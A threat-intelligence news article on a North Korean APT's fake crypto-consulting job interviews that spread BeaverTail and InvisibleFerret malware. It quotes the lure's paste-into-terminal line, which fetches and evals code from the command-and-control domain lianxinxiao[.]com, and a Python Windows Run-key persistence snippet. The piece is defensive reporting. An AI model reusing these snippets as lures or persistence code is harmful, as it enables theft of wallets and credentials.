A sophisticated North Korean advanced persistent threat (APT) group known as “Contagious Interview” has established elaborate fake cryptocurrency consulting companies to target job seekers with specialized malware.

The group, a subunit of the infamous North Korean state-sponsored Lazarus Group, has created three front companies—BlockNovas LLC, Angeloper Agency, and SoftGlide LLC—to distribute malware through deceptive job interview processes.

The campaign targets cryptocurrency professionals and developers with promises of high-paying remote positions.

Job applicants who engage with these fraudulent companies are unknowingly exposed to a trio of malware strains: BeaverTail, InvisibleFerret, and OtterCookie.

These malicious tools are specifically designed to steal cryptocurrency wallet credentials, browser data, and provide backdoor access to victim machines.

Silent Push threat analysts uncovered this elaborate scheme after identifying unusual configurations in BeaverTail malware samples.

Their investigation revealed the threat actors heavily utilize AI-generated images to create convincing “employee” profiles across multiple platforms, including LinkedIn, where the fake companies maintain active presences complete with falsified work histories and client testimonials.

The APT group’s technical sophistication is evident in their cross-platform malware deployment strategy, which affects Windows, macOS, and Linux systems.

One victim reported that their MetaMask wallet was compromised shortly after running code provided during a skill assessment test from BlockNovas.

Analysis of the compromised system revealed connections to command and control servers at domains including lianxinxiao[.]com.

Infection Mechanism: The Fake Interview Flow

The infection process begins when candidates apply for positions through legitimate job sites like Upwork, Freelancer.com, or cryptocurrency-specific job boards.

After initial contact, applicants are directed to company portals where they encounter a multi-stage interview process.

The critical infection point occurs during the “skill assessment” phase, where candidates are asked to record a video introduction.

When attempting to access camera permissions, the site presents an error message with a supposed fix involving pasting code into a terminal:-

fetch(eval(decodeURIComponent('\'lianxinxiao[.]com:5000/tokenizer'')))
.then(response => response.text()) 
.then(data => { eval(data); });

This innocent-looking code actually fetches and executes the BeaverTail JavaScript malware, which subsequently downloads InvisibleFerret, a Python-based backdoor.

The malware establishes persistence through various mechanisms depending on the operating system.

On Windows systems, it creates registry entries:-

import winreg
key_path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
key = winreg.HKEY_CURRENT_USER
with winreg.OpenKey(key, key_path, 0, winreg.KEY_ALL_ACCESS) as registry_key:
    winreg.SetValueEx(registry_key, "pythonws", 0, winreg.REG_SZ, f'{python_exe} {script_path}')

The malware specifically targets cryptocurrency wallets, including MetaMask, BNB Chain, Coinbase, TronLink, Phantom, Crypto.com, and Coin98.

It exfiltrates data to attacker-controlled servers and can deploy additional payloads based on C2 instructions.

To avoid falling victim to such attacks, cybersecurity experts recommend scrutinizing job offers thoroughly, never executing code from unknown sources during interviews, and using dedicated devices for cryptocurrency management.

Job seekers should verify company legitimacy through multiple channels before engaging with technical assessments that require executing code.

Malware Trends Report Based on 15000 SOC Teams Incidents, Q1 2025 out!-> Get Your Free Copy